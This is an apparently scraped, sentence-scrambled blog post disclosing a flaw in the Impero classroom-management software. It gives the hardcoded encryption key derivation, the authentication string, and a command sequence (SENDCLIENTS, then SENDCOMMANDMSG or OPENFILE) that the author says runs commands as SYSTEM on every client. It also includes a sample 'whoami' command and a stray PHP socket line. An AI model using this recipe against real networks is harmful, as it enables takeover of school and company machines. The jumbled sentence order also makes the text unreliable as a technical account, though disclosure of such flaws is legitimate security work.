$r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port) internet censorship is, and so are any and all RATs. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it.īasically, if you use Impero, please don't. It also runs "whoami > c:\lol.txt", also as SYSTEM. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. There's an OSX version, but I haven't properly looked into that. We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc. My PoC also does negotiatiation, but I'm not sure if that's needed. Then, we have full range to do whatever we want. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe.
This is done by sending "-1|AUTHENTICATE\x02PASSWORD". ISO10126 padding is used.Īfter connection, a client must authenticate. And a hardcoded key and iv that are both derived from sha512(Imp3ro). The proprietary Impero protocol on the wire is encrypted. Some reversing later, looks like Impero is completely pwned amirite. Unfortunately, when I asked about their security, nobody answered me. They had a booth at BETT back in January. They recently were in the news about how they implemented "anti-radicalisation" shit or something.
If you're unsure what Impero is, it's essentially a corporate/educational RAT.
0 kommentar(er)
